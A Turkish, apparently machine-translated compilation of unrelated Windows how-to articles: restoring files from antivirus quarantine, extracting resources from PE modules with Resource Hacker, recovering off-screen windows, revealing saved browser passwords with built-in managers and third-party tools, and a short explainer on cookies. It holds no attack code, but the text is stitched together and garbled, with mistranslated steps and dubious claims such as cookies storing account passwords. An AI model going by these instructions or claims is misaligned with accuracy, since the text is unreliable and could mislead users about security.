4. Daha zor şifre çözme yöntemlerini kullanmak istiyorsanız, düğmelerin alt sırasındaki Yardım düğmesini tıklayın. Önceki adımda açıklanan özellikle basit olana ek olarak program iki seçenek daha sunar. İngilizce arayüze rağmen Pass Checker yardımı Rusça yazıldığından çeviride herhangi bir sorun yaşanmayacak.

Konuyla ilgili video

Yanlışlıkla taşınan dosyaları antivirüs programlarının büyük çoğunluğunun karantinasından çıkarma prosedürü az çok standartlaştırılmıştır ve yalnızca ayrıntılarda farklılık gösterir. Bu durumda Microsoft Security Essentials, Norton ve Avast Antivirus uygulamalarının karantinaya alınan dosyalarını onarma işlemini ele alıyoruz.

İhtiyacın olacak

• - Microsoft Güvenlik Araçları;
• - dur! Ücretsiz Antivirüs 5.0;
• - Norton Internet Güvenliği

Talimatlar

1. Microsoft Security Essentials uygulamasını başlatın ve dosyaları karantinadan çıkarma işlemini gerçekleştirmek için ana program penceresindeki “Günlük” sekmesine gidin.

2. "Karantinaya alınan öğeler" öğesini seçin ve açılan iletişim kutusunda "Verileri görüntüle" düğmesini tıklayın.

3. Açılan istek penceresine bilgisayar yöneticisinin şifresini girin ve listede karantinadan onarılacak dosyayı belirtin.

4. Dosya çıkarma prosedürünü tamamlamak için "Geri Yükle" düğmesini tıklayın veya Microsoft Security Essentials antivirüs uygulamasının karantinasını tamamen temizlemek için "Tümünü Sil" düğmesini kullanın.

5. Avast! antivirüs programının ana penceresinde “Bakım” menü öğesini seçin. Free Antivirus 5.0'ı seçin ve açılan iletişim kutusunun "Karantina" sekmesine gidin.

6. Uygulama penceresinin sağ tarafındaki listede onarılacak dosyanın içerik menüsünü çağırın ve seçilen dosyayı "Başlangıç ​​konumu" bölümünde belirtilen orijinal saklama konumuna çıkarmak için "Kurtar" komutunu belirtin.

7. Norton Internet Security antivirüs programının “Güvenlik Günlüğü” penceresinde “Karantina” öğesini seçin ve karantinaya alınan bir dosyayı düzeltme işlemini gerçekleştirmek için Seçenekler düğmesine tıklayın.

8. Gerekli dosyayı belirtin ve açılan “Tehlike Bulundu” penceresinde “Bu dosyayı geri yükle” komutunu seçin.

9. Yeni “Karantinadan Onar” iletişim kutusunda “Evet” butonuna tıklayın ve “Kapat” butonunu tıklayarak düzeltme işlemini tamamlayın.

Not!
Dosyaların karantinadan kaldırılmasına yalnızca zararsız olduklarından kesinlikle emin olmanız durumunda izin verilir!

Yararlı tavsiye
"Karantina" nın bir antivirüs uygulaması tarafından oluşturulan özel bir klasör olduğu unutulmamalıdır. Karantinaya alınan dosyalar işletim sisteminden tamamen yalıtılmıştır ve harici işlemler tarafından erişilemez. Başlatılamazlar, bu da depolarının güvenliğini sağlar.

Windows işletim sistemi, isteğe bağlı verileri dinamik kitaplıklara ve yürütülebilir modüllere dahil etmek için standart bir mekanizmanın yanı sıra bunlarla çalışmak için bir API'ye sahiptir. PE modüllerine kaynak olarak resimler, dizi tabloları, örnek diyaloglar, araç çubukları, menüler ve diğer bilgiler eklenir. Bazen çeşitli amaçlar için derlenmiş bir modülden kaynak çıkarmak gerekebilir.

İhtiyacın olacak

• rpi.net.au/~ajohnson/resourcehacker adresinden indirilebilen ücretsiz bir Kaynak Hacker programıdır.

Talimatlar

1. PE modül dosyasını Resource Hacker'a yükleyin. Ana uygulama menüsünde Dosya ve Aç öğelerine adım adım tıklayın veya klavyenizdeki Ctrl+O tuş kombinasyonuna basın. Dosya açma iletişim kutusu görüntülenecektir. Hedef dosyanın bulunduğu dizine gidin. Katalog listesinden PE modülünü seçin. "Aç" düğmesini tıklayın.

2. Çekilmesi gereken kaynakların listesini belirleyin. PE dosyasını yükledikten sonra ana Resource Hacker penceresinin sol tarafında bir ağaç yapısı görüntülenecektir. Türe göre gruplandırılmış tüm modül kaynaklarının bir listesidir. Diyelim ki, diyalog kaynakları Diyalog bölümüne, imleç kaynakları - İmleç ve İmleç Grubu bölümlerine, simgeler - Simge ve Simge Grubu bölümlerine yerleştirilir.Bölümün tamamında yer alan hiyerarşinin ikinci katmanının düğümleri, kaynakların sayısal veya sembolik tanımlayıcılarıdır. Bunları genişletin ve iç içe geçmiş öğeleri vurgulayın. Bu durumda ilgili kaynaklar görselleştirilecektir. Simgeler, imleçler ve taramalar, ana uygulama penceresinin sağ panelinde resim olarak görüntülenecektir. Dize tabloları, hızlandırıcılar, sürüm bilgileri, örnek iletişim kutuları, menüler, araç çubukları için kod, RCC derleyicisiyle kullanıma uygun bir formatta oluşturulacak ve görüntülenecektir. Ayrıca örnek diyaloglar ayrı bir kayan pencerede görselleştirilir.

3. Önceki adımda keşfedilen kaynakları kaydetme işlemini başlatın. Soldaki ağaç yapısından gerekli öğeyi seçin. Ana uygulama menüsünün Eylem bölümünü açın. Özellikle uygun tipteki kaydetme işlemine karşılık gelen öğeyi seçin. Kaynağı, PE modülünde bulunanla aynı ikili veri parçası biçiminde kaydetmek istiyorsanız, "Kaynağı ikili dosya olarak kaydet..." öğesini seçin. Vurgulanan kaynağın derlenmiş sürümünü içeren bir dosyayı satın almak için “Kaynağı *.res dosyası olarak kaydet…” seçeneğini seçin. Benzer bir dosya, bir uygulama veya kütüphaneye bağlanmak için uygundur.Kaynakları orijinal haliyle çıkarmak için “Kaydet [Bölüm adı: alt bölüm adı: kaynak adı]…” gibi bir metin içeren öğeye tıklayın. Bu menü öğesi simgeler, imleçler ve resimlerden oluşan dosyaları çıkarmak için kullanılmalıdır.

4. Kaynakları dışarı çekin. “Kaynağı şuraya kaydet...” başlıklı iletişim kutusunda kaydedilecek dosyanın adını ve dizinini belirtin. "Kaydet" düğmesini tıklayın.

Bazen, Windows işletim sisteminde, bazı programların pencerelerinde garip bir şey olur: simge durumuna küçültüldüğünde ve her ekrana genişletildiğinde davranışı tipiktir, ancak orta boyutlu bir pencerede uygulama, görünür alanın ötesinde kaybolur. ekran. Masaüstünüzden düşen bir pencereyi geri almanın yöntemleri vardır ve bunlar o kadar da zor değildir.

İhtiyacın olacak

• Windows işletim sistemi.

Talimatlar

1. Bir nesneyi fark edilebilir bir alandan çıkarmanın ilk yöntemi, konumlandırmaya yönelik tüm manuel işlemleri işletim sisteminin kendisine emanet etmektir. Bunu yapmak için, sorun penceresine ek olarak herhangi bir uygulamaya ait bir pencere daha açın - örneğin Explorer'ı başlatın. Bundan sonra, içerik menüsünü açmak için görev çubuğundaki boş alana sağ tıklayın. İşletim sistemine, menüde listelenen yöntemlerden birini kullanarak açık pencereleri düzenlemesi için bir komut verin - "Pencereleri kademeli olarak görüntüle", "Pencereleri yığın halinde görüntüle" veya "Pencereleri yan yana görüntüle". Bundan sonra kayıp pencerenin davranışı normale dönecektir.

2. Diğer bir yöntem ise pencere konumlandırması için klavye kontrolünü kullanmaktır. Açtıktan sonra hareket ettirmek için fare imlecini kullanarak pencere başlığına ulaşmanıza gerek kalmayacaktır. Bu modu etkinleştirmek için Alt + Space + P kısayol tuşu birleşimine basın. Bundan sonra ok tuşlarını kullanarak gizli pencereyi masaüstünün görünür alanına taşıyın. Klavye konumlandırma modunu devre dışı bırakmak için herhangi bir yere sol tıklayın.

3. 3. yöntem - kullanılabilir masaüstü alanının genişletilmesi. Bu, ekran çözünürlüğünü artırarak yapılabilir. Windows 7 veya Vista'nın en son sürümlerini kullanıyorsanız, masaüstünüzdeki arka plan resmine sağ tıklayın ve açılan içerik menüsünden "Ekran Çözünürlüğü" adlı öğeyi seçin. İşletim sistemi, "Çözünürlük" açılır listesini açmanız ve kaydırıcıyı yukarı veya daha iyisi en üst işarete taşımanız gereken "Denetim Masası" uygulamalarından birini başlatacaktır. Daha sonra “Uygula” butonuna tıklayın. Uygulama çözünürlüğü değiştirecek ve bir zamanlayıcı başlatacak, ardından bu metamorfoz iptal edilecektir. Belirlenen süre içerisinde işlemi onaylamak için düğmeye basmanız gerekir. Bunu yaptıktan sonra eksik pencereyi bulun, masaüstünün ortasına taşıyın ve ekran çözünürlüğünü önceki değerine döndürün.

Çerezlerdeki bilgiler arasında kullanıcı kimlik verileri sıklıkla talep görmektedir. Ziyaretçileri hakkında gizli verileri kaydeden İnternet kaynaklarındaki kullanıcı adını ve şifreyi öğrenin.

İhtiyacın olacak

• – Windows işletim sistemini çalıştıran bilgisayar;
• - İnternet girişi;
• – web tarayıcıları: Mozilla Firefox, Opera, Internet Explorer, Google Chrome;
• – Opera Şifre Kurtarma programı;
• – BehindTheAsterisk yardımcı programı.

Talimatlar

1. Web sayfalarını görüntülemek için ayarlarda çerez kaydetme işlevi etkinleştirilmiş halde Mozilla Firefox tarayıcısını kullanıyorsanız, kayıtlı oturum açma bilgilerinizi ve şifrelerinizi yazılımda kolayca bulun. İnternet tarayıcınızı başlatın, “Araçlar”ı açın ve sistem ayarlarına gidin. Açılan ve birkaç sekme içeren pencerede “Güvenlik” seçeneğini etkinleştirin.

2. Açılan bölümde “Kayıtlı Şifreler” butonuna tıklayın ve yeni bir web tarayıcı sayfasına gidin. Farklı İnternet kaynaklarını ziyaret ettiğinizde bilgisayarın belleğinde saklanan tanımlama karakterlerine sahiptir. “Şifreleri göster” satırına tıklayın. Aynı tarayıcı menüsünden gizli bilgilerinizi koruyabilir ve şifre belirleyebilirsiniz.

3. Ünlü Opera tarayıcısını kullanarak küresel ağ kaynaklarını ziyaret ederseniz kullanıcı adlarını öğrenin. Web tarayıcınızın üst kısmındaki Araçlar menüsünü açın, Parola Yöneticisini kullanın ve kullanıcı oturum açma bilgilerinin listesini görüntüleyin.

4. Kayıtlı şifrelere erişmek için ek yazılım yükleyin ve bu amaçla Opera Şifre Kurtarma yardımcı programını tercih edin. Lütfen bir üçüncü taraf programının kişisel verilerinizin tam güvenliğini garanti etmediğini unutmayın.

5. Google Chrome tarayıcısında şifreleri görüntülerken, tarayıcı araç çubuğunda ilgili seçeneği açın. Gelişmiş ayarlara gidin ve “Çerezleri göster” seçeneğini etkinleştirin.

6. Bilinçaltı olarak erişilebilen bir arayüz olan BehindTheAsterisks'i içeren çok işlevli ücretsiz yardımcı programı kullanın ve standart Internet Explorer tarayıcısının çerezlerinde şifreleri bulun. Kod sözcüklerini yıldız işareti yerine sembol olarak görüntülemek ve şifrelere erişim sağlamak için program seçeneklerine gidin.

Çerezler, kullanıcının bilgisayarında saklanan ve ziyaret ettiği siteler hakkında bilgi içeren dosyalardır. Çerezlerin desteği ile kullanıcının hangi sayfaları ziyaret ettiğini öğrenebilirsiniz.

Çerezler, kullanıcının bilgisayarında saklanan, şimdiye kadar ziyaret edilen siteler hakkında bilgi içeren dosyalardır. Yani, bir kullanıcı herhangi bir web kaynağını ziyaret ettiğinde, onunla ilgili bilgiler çerezlere kaydedilir ve bu siteyi daha sonra ziyaret ettiğinde web sunucusuna aktarılır.

Bunlar ne için?

Çerezler, web sitelerindeki hesap şifreleri, örnek renk, kullanıcının site için oluşturduğu yazı tipi boyutu vb. gibi çeşitli bilgiler içerir. Çerezlerin ayarları kaydetmek için nasıl kullanılabileceğine dair en net örneği Google arama motoru vermektedir. Bu makine, arama sonuçlarınızı kişiselleştirme fırsatı sağlar; sayfadaki sonuç sayısından, döndürülen sayfaların formatından, arayüz dilinden ve diğer ayarlardan bahsediyoruz. Web sitelerindeki hesapların şifrelerine gelince, her kullanıcı, bir web kaynağında kullanıcı adını ve şifresini belirledikten sonra, site hakkındaki bu bilgiler mekanik olarak çerezlere kaydedildiğinden, yeniden yetkilendirme sırasında bunu bir daha yapmadığını birden fazla kez fark etmiştir. . Kaynak tekrar ziyaret edildiğinde veriler, kullanıcıyı mekanik olarak tanıyan web sunucusuna gönderilir ve kullanıcıyı alanları tekrar doldurma zorunluluğundan kurtarır. Çerezler istatistiklerin korunması açısından da faydalı olabilir. Çerezler bilgisayarınıza herhangi bir tehlike oluşturamaz. Bu, ona zarar veremeyen herkes için yalnızca metin verileridir. Çerezlerin desteği ile kullanıcının bilgisayarından bilgi silmek, aktarmak veya okumak mümkün değildir ancak hangi sayfaları ziyaret ettiğini öğrenmek mümkündür. Modern tarayıcılar kullanıcıya çerezleri kaydedip kaydetmeme seçeneğini daha kolay sunar, ancak kullanıcı çerezlerin kaydedilmesini devre dışı bırakmayı seçerse bazı sitelerle çalışırken yaşanabilecek aksaklıklara hazırlıklı olmalıdır.

Çerezlerin dezavantajları

İlk olarak, çerezlerin bir kullanıcıyı her zaman doğru şekilde tanımlaması muhtemel değildir. İkincisi, bir suçlu tarafından çalınabilirler. Yanlış tanımaya gelince, bunun nedeni kullanıcının birden fazla tarayıcı kullanması olabilir. Her tarayıcının kendi deposu vardır, bu nedenle çerezler kullanıcıyı değil, tarayıcısını ve PC'sini tanımlar ve eğer birden fazla tarayıcısı varsa, o zaman birkaç çerez kümesi olacaktır. Kullanıcının tarayıcısı ile web sunucusu arasındaki sürekli çerez alışverişi saldırganların ilgisini çekebilir; eğer ağ trafiği şifrelenmemişse, özel sniffer programları yardımıyla kullanıcının çerezlerini okumak mümkündür. Bu sorun trafiğin şifrelenmesi ve farklı protokollerin kullanılmasıyla çözülebilir.

Konuyla ilgili video